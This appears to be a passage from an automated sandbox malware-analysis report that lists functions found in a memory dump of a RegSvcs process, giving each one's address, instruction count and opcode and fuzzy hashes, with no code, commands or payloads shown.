                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ff7c90454b346b951ff28842bc5ca48a5fd77246a82ab8bbf0c1c94e84ffd25
                                                                                                                              • Instruction ID: fa49e63f4ec5e5d66a175cf6289de846103614a6439cd3672462a60cb70b4ddd
                                                                                                                              • Opcode Fuzzy Hash: 9ff7c90454b346b951ff28842bc5ca48a5fd77246a82ab8bbf0c1c94e84ffd25
                                                                                                                              • Instruction Fuzzy Hash: AB516C716083029FD755DF69C880AAFB7E5BFD8204F44492EF689CB290D730D945CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014845B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction ID: ea35962137252f566efe30d2b847b40f0b0e1f89791a91816ed0201f128a0d93
                                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction Fuzzy Hash: 4E518D75E0021AABDF15EF98C440BEFBBB5AF45754F08406BEA05AB360D734D945CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction ID: a358ed77f9b575b8865b2d019bcccdb4b8268ebf8a66b964e673af5b6d5df3ad
                                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction Fuzzy Hash: 3751C631D0020AAFDF21DA95C888BAFBBF9AB10326F11466BD611772B1D7709E45C7A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01528B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d83fcdcb84d992a252c20acc4afdddcf01744aab2ccb434ea27269d90931572
                                                                                                                              • Instruction ID: 5e329d2632647b975d597d20901148dc678e73b5a5ec24d55bbb278700fe94bf
                                                                                                                              • Opcode Fuzzy Hash: 0d83fcdcb84d992a252c20acc4afdddcf01744aab2ccb434ea27269d90931572
                                                                                                                              • Instruction Fuzzy Hash: DF41F6727016229BD729DB6DC894B7FBBDAFF92220F088619F9559F2C0D734D801C691
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014ECBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b3f5b615c03a3dc728d9c57c2b4d609de0826aa56b9705873332faf3f0211ad0
                                                                                                                              • Instruction ID: ace029c160fa0a84641c165c84cdbc7ff9d4d32c9dc3126a5a76a36b89b701e2
                                                                                                                              • Opcode Fuzzy Hash: b3f5b615c03a3dc728d9c57c2b4d609de0826aa56b9705873332faf3f0211ad0
                                                                                                                              • Instruction Fuzzy Hash: 3A51BA7290021ADFCB20DFA9C8D4DAFBBF9FF58255B51451AD516A7310D732AD02CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 67b334d56ca61937d9e660e71023c593e78bd6c71450254fdf1396d898056427
                                                                                                                              • Instruction ID: 5051e61fa5e6083f83f522331925a38a11fd7ede32b39d440c4ee16668d7d40e
                                                                                                                              • Opcode Fuzzy Hash: 67b334d56ca61937d9e660e71023c593e78bd6c71450254fdf1396d898056427
                                                                                                                              • Instruction Fuzzy Hash: 37414671740302DBCF25EF6A98A0F6A3B64EB24758F52002FED0A9F271D7B59805C791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0152A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction ID: 323ff72ae12d69fe8cf9d07de8d510aea763150c74d796997e5f28a4c76e8f7d
                                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction Fuzzy Hash: 1841E8336007269FD725CF68C984A6EB7E9FF91210B05462EE9528FA80EB70ED04C7D0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014901F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3e9057c5f23fa5c38f11eb055571adcbb0446eb653563b9e5921256a29588f3
                                                                                                                              • Instruction ID: b2586b10590781c568d6125b72c85c52d6d9a7c5af45411c219a2471683ca823
                                                                                                                              • Opcode Fuzzy Hash: e3e9057c5f23fa5c38f11eb055571adcbb0446eb653563b9e5921256a29588f3
                                                                                                                              • Instruction Fuzzy Hash: E4419C369002199BDF24DF99C440AEEBBB8BF58710F14816BF815E7360D7359D42CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ee2c689a7e1211a67fba8a9350e6fa79b271636e34c41aad3722e9276eb689e
                                                                                                                              • Instruction ID: 85e03ac9b985c73b122b7e5e46fadaa40ced73da9b717f4df1212b475c6c653d
                                                                                                                              • Opcode Fuzzy Hash: 9ee2c689a7e1211a67fba8a9350e6fa79b271636e34c41aad3722e9276eb689e
                                                                                                                              • Instruction Fuzzy Hash: B441E3716003029FD720EF29C884A6BB7E6FF98214F01482FE957D7321DB75E84A8B51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2750 Relevance: .1, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction ID: 696663246d61bebbcb4e34bad17e5389424f647a5fb7f7d8f8295d7b19dc8376
                                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction Fuzzy Hash: B1515B75A00215CFDF15CF98C590AAEF7B2FF84724F2881AAD915A7361D770AE42CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01466154 Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3fd8035d51892519802f92cf0363b98cccfaf2b270b3af2f5bff89562ec3a8e1
                                                                                                                              • Instruction ID: 0ded3aae885e868771941c95d35cb58ce2d9c3538025bcb9b1ab20b067af3641
                                                                                                                              • Opcode Fuzzy Hash: 3fd8035d51892519802f92cf0363b98cccfaf2b270b3af2f5bff89562ec3a8e1
                                                                                                                              • Instruction Fuzzy Hash: 28511674900256DFDB659B28CC00BE9BBB9FF21318F1542ABD5259B3E1D7345981CF41
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01460BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f72bdc7778e96415fe7282c7caad8b0327461ad06513995ee7d68c81d0487f52
                                                                                                                              • Instruction ID: 57bb991bcdea0d3a632cfdcd32ac047c613680aa8566d8b530ba674011f9634b
                                                                                                                              • Opcode Fuzzy Hash: f72bdc7778e96415fe7282c7caad8b0327461ad06513995ee7d68c81d0487f52
                                                                                                                              • Instruction Fuzzy Hash: 7541A631A002299FDB21DF69C940BEE77B8EF94740F0500ABE908AB361D774DE81CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0152866E Relevance: .1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction ID: 045cd656970cb8d97e11bdb390245cd196721d8244ff2705d2dccca680815ba3
                                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction Fuzzy Hash: 3F417577B00126ABDB15DFD9CC84AAFBBFABF99610F284069E5049B381D671DD01C760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01460887 Relevance: .1, Instructions: 128COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 128d6be69d55b8c4e65a35f4314242c0d06732f6add214e5ffe54bb4a3dc2ffa
                                                                                                                              • Instruction ID: 989b2ec91d65f3404d96641e813c817590594a27067a04083462582dcfd05ac4
                                                                                                                              • Opcode Fuzzy Hash: 128d6be69d55b8c4e65a35f4314242c0d06732f6add214e5ffe54bb4a3dc2ffa
                                                                                                                              • Instruction Fuzzy Hash: 1C41C2706007019FE325CF29C580A66B7FAFF59318B144A6FE55787B61E730E84ACB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a0cb9125957290fe2dfcc153e130b68a8ddef57256d45f2f45ccdb04af97e813
                                                                                                                              • Instruction ID: 75a3321305f4c495ecc412e829543dec591a596fc4a175e3f0c5b8868b2d4bf4
                                                                                                                              • Opcode Fuzzy Hash: a0cb9125957290fe2dfcc153e130b68a8ddef57256d45f2f45ccdb04af97e813
                                                                                                                              • Instruction Fuzzy Hash: 5341BE32900205CFDB21EF6CD4947EE7BB0BF54610F25016BD421AB3A5EBB49985DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01468BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8a48a2c2731474f63c06017ecb88c7f4ddd3a7e6ff3e713ebb8932b9bf35e39f
                                                                                                                              • Instruction ID: fd5a38ef3c02ea4c6f21b3c470d532ef5e03795948c6e866f0787bfa9b69ab52
                                                                                                                              • Opcode Fuzzy Hash: 8a48a2c2731474f63c06017ecb88c7f4ddd3a7e6ff3e713ebb8932b9bf35e39f
                                                                                                                              • Instruction Fuzzy Hash: DA410331900302CBD724CF5DD880A6ABBB9FFA4718F15812FD9219F369D7759842CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01458918 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 733bf08fc8cff8f9ad72baf0b527e2b09753e4867608a019da0e015bf3b5b942
                                                                                                                              • Instruction ID: 7ae047acf014addcb76e54b8a32d49551761a67a9f40f381c6ca7519e2bd5748
                                                                                                                              • Opcode Fuzzy Hash: 733bf08fc8cff8f9ad72baf0b527e2b09753e4867608a019da0e015bf3b5b942
                                                                                                                              • Instruction Fuzzy Hash: B0414E315083069ED312DF668880A6BB7E9EF94B54F41092FF984D7261E730DE058BA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction ID: f28a8f68efc52c086fa2893069c8049f1caa1b6fda379863ab80f302b73714cb
                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction Fuzzy Hash: B6413C71A00211EBDB21DF5D84A07FBBBA1EB60B54F25816BED45CB362D6328D41C7A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014609AD Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d71428320a210a82cfc06da8f3f2347c1acaede5d59bd3dd556fa2a5f7ca7bc
                                                                                                                              • Instruction ID: 104c1194353d3b12a5725c38af9887d3413337d4193dd559b6f8049127917ec8
                                                                                                                              • Opcode Fuzzy Hash: 6d71428320a210a82cfc06da8f3f2347c1acaede5d59bd3dd556fa2a5f7ca7bc
                                                                                                                              • Instruction Fuzzy Hash: 36416971640601EFD321CF19C840B6ABBF9EF64358F20866FE4498B361E770E9428B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01490710 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction ID: fa245f1dbc56c5c763a684c7d1bd10001d293db393bc6a73098643e31f5ec091
                                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction Fuzzy Hash: 49412A71A00705EFDB24CF99C980AAABBF9FF18710B10496EE556DB6A0D330EA45CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146262C Relevance: .1, Instructions: 119COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fc68cdee0f01eced69227377821e964e478cbfe51f9b4b426cde99b6fdbf0bc0
                                                                                                                              • Instruction ID: eee3f92daad2cfe890240db00b062cc2ae784b0be8bc82ed08857f9869fdd435
                                                                                                                              • Opcode Fuzzy Hash: fc68cdee0f01eced69227377821e964e478cbfe51f9b4b426cde99b6fdbf0bc0
                                                                                                                              • Instruction Fuzzy Hash: 3E419CB1501701EFCB21EF29C940E6AB7F9FF64229F10866FC41A9B6B1DB709941CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b3b7c8ac619222b2952edc53a2a5ed48760dba5bbe0487eff41722eccc30ca0d
                                                                                                                              • Instruction ID: ed379b430ae7c394dea5b847cb43cd1fb9482aa451a3fde3ccd6692482ff6d5a
                                                                                                                              • Opcode Fuzzy Hash: b3b7c8ac619222b2952edc53a2a5ed48760dba5bbe0487eff41722eccc30ca0d
                                                                                                                              • Instruction Fuzzy Hash: 5F3149B1A00255DFDB11CF58C480B99BBF0FB59724F2085AED519EB261D3769902CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014580A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b295a84978fb55606a2015d1dc7f3e6d8678aefcc2f6851bee67f3856da27c00
                                                                                                                              • Instruction ID: fe77039fcbddddc25605c16a28a2ee2922f7d11cef683f1828e77d3c21464cf4
                                                                                                                              • Opcode Fuzzy Hash: b295a84978fb55606a2015d1dc7f3e6d8678aefcc2f6851bee67f3856da27c00
                                                                                                                              • Instruction Fuzzy Hash: 6241D171A05517AFDB41DF1AC880AA9BBB1FB54664F14822BDC16A72A2DF30ED418B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: baf648b023f59604c537bf851a6a5dc0900ea5562163acb3ce9cc35620970a4f
                                                                                                                              • Instruction ID: 99a824645f1d5cb1b6c084d7528c372007e58d1cd43adeff17fcfc2775145af0
                                                                                                                              • Opcode Fuzzy Hash: baf648b023f59604c537bf851a6a5dc0900ea5562163acb3ce9cc35620970a4f
                                                                                                                              • Instruction Fuzzy Hash: 2841D3726046419FD320DF29C844B6BB7E5BFD8700F14061EF9A89B6A0E770E905CBA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01464859 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26120bee39d62ba117f7c3358b6164c75df85d817d7ba13087efd73417147f49
                                                                                                                              • Instruction ID: c8cc10502e395faf6843e1228b925efc8e6a1fd5f069bd8f78364cd3423ba9b7
                                                                                                                              • Opcode Fuzzy Hash: 26120bee39d62ba117f7c3358b6164c75df85d817d7ba13087efd73417147f49
                                                                                                                              • Instruction Fuzzy Hash: 0241B2702403018BDB25DF29D894B2BBBE9EF90758F18442EE6558B2B1D770D849CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01458B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c330d4679af936d1de5db3faf5cfe7d7f3e0e3e38ae127984a7672a8f62214e
                                                                                                                              • Instruction ID: d1aa88e4764cec96be75349df69c69da8e2afcff06407a494ef833ca056546b1
                                                                                                                              • Opcode Fuzzy Hash: 6c330d4679af936d1de5db3faf5cfe7d7f3e0e3e38ae127984a7672a8f62214e
                                                                                                                              • Instruction Fuzzy Hash: BB419171A01606DFCB55CF6AC98099DB7F1FF98320B14862FD866A7372DB349941CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014702E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction ID: c02462f0f51149d0049ad851b8d88265209221bad635bbf34782eae5626c9e95
                                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction Fuzzy Hash: 64312531A01244AFDB22CB69CC80BDBBFE9AF25350F0445ABF855D7362D2749885CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
